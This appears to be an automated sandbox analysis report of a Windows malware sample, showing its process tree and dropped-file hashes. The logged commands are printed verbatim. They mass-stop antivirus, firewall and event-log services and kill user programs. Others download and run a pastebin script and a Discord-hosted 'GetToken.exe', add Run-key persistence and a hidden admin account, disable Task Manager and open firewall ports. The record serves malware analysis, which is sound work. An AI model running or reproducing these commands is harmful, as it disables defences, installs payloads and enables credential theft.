C:\Windows\system32\net.exenet stop "McAfee SecurityCenter Update Manager" /y2⤵PID:2776
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee SecurityCenter Update Manager" /y3⤵PID:3416
-
-
-
C:\Windows\system32\net.exenet stop "Symantec SPBBCSvc" /y2⤵PID:4752
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec SPBBCSvc" /y3⤵PID:4384
-
-
-
C:\Windows\system32\net.exenet stop "Ahnlab Task Scheduler" /y2⤵PID:4376
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Ahnlab Task Scheduler" /y3⤵PID:2680
-
-
-
C:\Windows\system32\net.exenet stop navapsvc /y2⤵PID:4044
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop navapsvc /y3⤵PID:2972
-
-
-
C:\Windows\system32\net.exenet stop "Sygate Personal Firewall Pro" /y2⤵PID:3436
-
-
C:\Windows\system32\net.exenet stop vrmonsvc /y2⤵PID:1780
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop vrmonsvc /y3⤵PID:4628
-
-
-
C:\Windows\system32\net.exenet stop MonSvcNT /y2⤵PID:1928
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MonSvcNT /y3⤵PID:1472
-
-
-
C:\Windows\system32\net.exenet stop SAVScan /y2⤵PID:800
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVScan /y3⤵PID:1484
-
-
-
C:\Windows\system32\net.exenet stop NProtectService /y2⤵PID:3760
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NProtectService /y3⤵PID:1604
-
-
-
C:\Windows\system32\net.exenet stop ccSetMGR /y2⤵PID:3144
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMGR /y3⤵PID:4852
-
-
-
C:\Windows\system32\net.exenet stop ccEvtMGR /y2⤵PID:612
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMGR /y3⤵PID:1444
-
-
-
C:\Windows\system32\net.exenet stop srservice /y2⤵PID:1100
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop srservice /y3⤵PID:4644
-
-
-
C:\Windows\system32\net.exenet stop "Symantec Network Drivers Service" /y2⤵PID:1188
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Network Drivers Service" /y3⤵PID:1796
-
-
-
C:\Windows\system32\net.exenet stop "norton Unerase Protection" /y2⤵PID:2816
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton Unerase Protection" /y3⤵PID:4716
-
-
-
C:\Windows\system32\net.exenet stop MskService /y2⤵PID:2172
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MskService /y3⤵PID:3844
-
-
-
C:\Windows\system32\net.exenet stop MpfService /y2⤵PID:2880
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MpfService /y3⤵PID:4276
-
-
-
C:\Windows\system32\net.exenet stop mcupdmgr.exe /y2⤵PID:1740
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mcupdmgr.exe /y3⤵PID:1944
-
-
-
C:\Windows\system32\net.exenet stop "McAfeeAntiSpyware" /y2⤵PID:3120
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfeeAntiSpyware" /y3⤵PID:3716
-
-
-
C:\Windows\system32\net.exenet stop helpsvc /y2⤵PID:3712
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop helpsvc /y3⤵PID:3460
-
-
-
C:\Windows\system32\net.exenet stop ERSvc /y2⤵PID:4820
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ERSvc /y3⤵PID:4068
-
-
-
C:\Windows\system32\net.exenet stop "*norton*" /y2⤵PID:5072
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "*norton*" /y3⤵PID:992
-
-
-
C:\Windows\system32\net.exenet stop "*Symantec*" /y2⤵PID:1248
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "*Symantec*" /y3⤵PID:4932
-
-
-
C:\Windows\system32\net.exenet stop "*McAfee*" /y2⤵PID:4456
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "*McAfee*" /y3⤵PID:3544
-
-
-
C:\Windows\system32\net.exenet stop ccPwdSvc /y2⤵PID:1516
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccPwdSvc /y3⤵PID:2020
-
-
-
C:\Windows\system32\net.exenet stop "Symantec Core LC" /y2⤵PID:2224
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Core LC" /y3⤵PID:4996
-
-
-
C:\Windows\system32\net.exenet stop navapsvc /y2⤵PID:228
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop navapsvc /y3⤵PID:2080
-
-
-
C:\Windows\system32\net.exenet stop "Serv-U" /y2⤵PID:4956
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Serv-U" /y3⤵PID:4640
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵PID:4784
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y3⤵PID:3728
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Client" /y2⤵PID:4356
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Client" /y3⤵PID:4808
-
-
-
C:\Windows\system32\net.exenet stop "Symantec AntiVirus Client" /y2⤵PID:1848
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec AntiVirus Client" /y3⤵PID:4044
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Server" /y2⤵PID:4160
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Server" /y3⤵PID:3176
-
-
-
C:\Windows\system32\net.exenet stop "NAV Alert" /y2⤵PID:4336
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NAV Alert" /y3⤵PID:2120
-
-
-
C:\Windows\system32\net.exenet stop "Nav Auto-Protect" /y2⤵PID:1032
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Nav Auto-Protect" /y3⤵PID:2188
-
-
-
C:\Windows\system32\net.exenet stop "McShield" /y2⤵PID:3684
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McShield" /y3⤵PID:2424
-
-
-
C:\Windows\system32\net.exenet stop "DefWatch" /y2⤵PID:3988
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "DefWatch" /y3⤵PID:2140
-
-
-
C:\Windows\system32\net.exenet stop eventlog /y2⤵PID:900
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop eventlog /y3⤵PID:612
-
-
-
C:\Windows\system32\net.exenet stop InoRPC /y2⤵PID:4628
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop InoRPC /y3⤵PID:2128
-
-
-
C:\Windows\system32\net.exenet stop InoRT /y2⤵PID:4052
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop InoRT /y3⤵PID:1440
-
-
-
C:\Windows\system32\net.exenet stop InoTask /y2⤵PID:2424
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop InoTask /y3⤵PID:2232
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵PID:4776
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y3⤵PID:2104
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Client" /y2⤵PID:4768
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Client" /y3⤵PID:1844
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Corporate Edition" /y2⤵PID:3836
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Corporate Edition" /y3⤵PID:2160
-
-
-
C:\Windows\system32\net.exenet stop "ViRobot Professional Monitoring" /y2⤵PID:2204
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ViRobot Professional Monitoring" /y3⤵PID:1892
-
-
-
C:\Windows\system32\net.exenet stop "PC-cillin Personal Firewall" /y2⤵PID:2752
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "PC-cillin Personal Firewall" /y3⤵PID:3564
-
-
-
C:\Windows\system32\net.exenet stop "Trend Micro Proxy Service" /y2⤵PID:4676
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Trend Micro Proxy Service" /y3⤵PID:1860
-
-
-
C:\Windows\system32\net.exenet stop "Trend NT Realtime Service" /y2⤵PID:3412
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Trend NT Realtime Service" /y3⤵PID:4204
-
-
-
C:\Windows\system32\net.exenet stop "McAfee.com McShield" /y2⤵PID:3720
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee.com McShield" /y3⤵PID:4720
-
-
-
C:\Windows\system32\net.exenet stop "McAfee.com VirusScan Online Realtime Engine" /y2⤵PID:5060
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee.com VirusScan Online Realtime Engine" /y3⤵PID:4324
-
-
-
C:\Windows\system32\net.exenet stop "SyGateService" /y2⤵PID:4268
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SyGateService" /y3⤵PID:1248
-
-
-
C:\Windows\system32\net.exenet stop "Sygate Personal Firewall Pro" /y2⤵PID:1296
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y3⤵PID:3124
-
-
-
C:\Windows\system32\net.exenet stop "Sophos Anti-Virus" /y2⤵PID:1880
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Anti-Virus" /y3⤵PID:3912
-
-
-
C:\Windows\system32\net.exenet stop "Sophos Anti-Virus Network" /y2⤵PID:4220
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Anti-Virus Network" /y3⤵PID:3676
-
-
-
C:\Windows\system32\net.exenet stop "eTrust Antivirus Job Server" /y2⤵PID:3508
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "eTrust Antivirus Job Server" /y3⤵PID:4340
-
-
-
C:\Windows\system32\net.exenet stop "eTrust Antivirus Realtime Server" /y2⤵PID:4348
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "eTrust Antivirus Realtime Server" /y3⤵PID:4376
-
-
-
C:\Windows\system32\net.exenet stop "Sygate Personal Firewall Pro" /y2⤵PID:1492
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y3⤵PID:2120
-
-
-
C:\Windows\system32\net.exenet stop "eTrust Antivirus RPC Server" /y2⤵PID:3384
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "eTrust Antivirus RPC Server" /y3⤵PID:4628
-
-
-
C:\Windows\system32\net.exenet stop netsvcs2⤵PID:3560
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop netsvcs3⤵PID:1128
-
-
-
C:\Windows\system32\net.exenet stop spoolnt2⤵PID:3684
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop spoolnt3⤵PID:2424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K black.bat2⤵PID:1100
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4632
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1892
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2700
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1428
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4268
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4352
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4384
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2680
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2960
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:720
-
-
-
C:\Windows\system32\rundll32.exeRUNDLL32 USER32.DLL SwapMouseButton2⤵PID:996
-
-
C:\Windows\system32\tskill.exetskill iexplore2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1796
-
-
C:\Windows\system32\tskill.exetskill msnmsgr2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4624
-
-
C:\Windows\system32\tskill.exetskill excel2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3564
-
-
C:\Windows\system32\tskill.exetskill iTunes2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1620
-
-
C:\Windows\system32\tskill.exetskill calc2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1784
-
-
C:\Windows\system32\tskill.exetskill msaccess2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2616
-
-
C:\Windows\system32\tskill.exetskill safari2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3376
-
-
C:\Windows\system32\tskill.exetskill mspaint2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2124
-
-
C:\Windows\system32\tskill.exetskill outlook2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4932
-
-
C:\Windows\system32\tskill.exetskill WINWORD2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1516
-
-
C:\Windows\system32\tskill.exetskill msnmsgr2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1880
-
-
C:\Windows\system32\tskill.exetskill firefox2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3104
-
-
C:\Windows\system32\tskill.exetskill LimreWire2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2428
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K 2b2crypt.cmd2⤵PID:3008
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K 2b2crypt.m.cmd2⤵PID:4052
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest https://pastebin.com/raw/2K5m42Xp -outfile ycynlog.cmd"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3048
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K ycynlog.cmd2⤵
- NTFS ADS
PID:3012 -
C:\Windows\system32\attrib.exeattrib +h +s ycynlog.cmd3⤵
- Views/modifies file attributes
PID:2760
-
-
C:\Windows\system32\reg.exereg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_4487_toolbar" /t "REG_SZ" /d ycynlog.cmd /f3⤵
- Adds Run key to start application
PID:4336
-
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\.bat /f3⤵
- Adds Run key to start application
- Modifies registry key
PID:2312
-
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f3⤵PID:2356
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe', 'GetToken.exe')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3556
-
-
C:\Users\Admin\GetToken.exeGetToken.exe3⤵
- Executes dropped EXE
PID:648
-
-
C:\Windows\system32\curl.execurl -s -o IP.txt https://ipv4.wtfismyip.com/text3⤵PID:4388
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K FuckPorts.cmd2⤵PID:364
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"3⤵PID:3676
-
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD3⤵PID:4140
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD4⤵PID:996
-
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:3272
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:3592
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:4376
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:4000
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:4632
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:4288
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:4412
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:1348
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:4412
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:3896
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:2188
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K FuckPorts.cmd2⤵PID:1204
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3436
-
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD3⤵PID:1944
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD4⤵PID:2148
-
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:4288
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:3508
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:3892
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:3732
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:4228
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:3456
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:3188
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:2960
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:1512
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:3852
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:3600
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:800
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K FuckPorts.cmd2⤵PID:1740
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2216
-
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD3⤵PID:4856
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD4⤵PID:1424
-
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:3564
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:1248
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3676
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:4256
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:2300
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:3104
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:4680
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:648
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:4488
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:4348
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K FuckPorts.cmd2⤵PID:1428
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4960
-
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD3⤵PID:4716
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD4⤵PID:3856
-
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:2648
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:1972
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:5024
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:3756
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:2260
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:2488
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:4208
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:60
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:4808
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=140913⤵PID:3592
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=249463⤵PID:1904
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\loveletter.vbs"2⤵PID:5024
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\mail.vbs"2⤵PID:1840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Get-Content -Path C:\Users\Admin\Desktop\YcynNote.txt | Out-Printer"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3024
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y1⤵PID:2960
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca1⤵PID:2148
-
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4636
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d136d3411d4aa688242c53cafb993aa6
SHA11a81cc78e3ca445d5a5193e49ddce26d5e25179f
SHA25600ae5433c0107cc164516c7849b4cff7b6faeb52e5afa65c01dbd8c7a5efe397
SHA512282ea53f8093c00e8c64d253782068211f8c4187391d5078755f55dedb8825c0042173d82f489d7b6c06e88184b70e83c1e92dadb80f57bd96c95855ac6b3da1
-
Filesize
64B
MD5a6c9d692ed2826ecb12c09356e69cc09
SHA1def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA5122f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3
-
Filesize
1KB
MD51dffbab5ecc6d06e8b259ad505a0dc2a
SHA10938ec61e4af55d7ee9d12708fdc55c72ccb090c
SHA256a9d2e6d35c5e9b94326042c6f2fe7ef381f25a0c02b8a559fc1ee888ccffb18e
SHA51293209a16400574416f6f992c2d403acc399179fc911818c4967c9a0211924486878578d1c98ba3bc9e269012603c96ab118a291bf53c57d8af9ab48f9e7b9b76
-
Filesize
64B
MD5e8528a3cdf5bc45593ad1982ff7385af
SHA1a24420980496cd0681aef662abebb2ae3acd02a1
SHA2561de63662c8c6b22e221ab985b94c1c9c2dd015b68d242c0914300c0108acfd6a
SHA512afefaa3be56974b017b7245b36743db893cc37cfa61023cef0cfa0c39c6f160df3ed70e7c35232f6f9fa8a1b9e461be43f98828d1b3e6e7c088d5dde62ef7851
-
Filesize
64B
MD5e8528a3cdf5bc45593ad1982ff7385af
SHA1a24420980496cd0681aef662abebb2ae3acd02a1
SHA2561de63662c8c6b22e221ab985b94c1c9c2dd015b68d242c0914300c0108acfd6a
SHA512afefaa3be56974b017b7245b36743db893cc37cfa61023cef0cfa0c39c6f160df3ed70e7c35232f6f9fa8a1b9e461be43f98828d1b3e6e7c088d5dde62ef7851
-
Filesize
64B
MD5446dd1cf97eaba21cf14d03aebc79f27
SHA136e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
-
Filesize
64B
MD5446dd1cf97eaba21cf14d03aebc79f27
SHA136e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
-
Filesize
1KB
MD524c13d5530c176b565619683e21ea2e7
SHA1d65f5d8481f8b2f53ee1295f8fb06c9170914171
SHA2567282f4459a68e55266453fc018a89377d3420baa44977f528b66eee029df84d6
SHA51212e079e0fbab640904e9dbf746785a7824656186c26930ece5d9fb1894935feb691705145e3b3d2480a84bab2a6b99a14c735d146a747074015477c5091ffb41
-
Filesize
467B
MD54229508619c5ea6b34d057303772f429
SHA1f2531bb1614ce410f51966495be5573fd22bb84b
SHA2564fb248ef44308e95e7f61753b014f32c00305d9b1385b1c0202e144f56718fdd
SHA5120f8bb8e41ad99e73160eb74264f914f23b1e0913695f6215cc370eac009dc5105875509d33f0a9ce1d0f46faa1c8f2cc5dac580046c88e5ce6d51dd3a369a070
-
Filesize
71B
MD53544e4b7ac1418d34061648a9f3e3dc6
SHA130e88f4aa1cc6c936c9c274f9f4f53b491a4d8ce
SHA256db24f2b49b88e4cf7c3569a067f3e6e325d54a3be2368262d37a6a34f4f8aae8
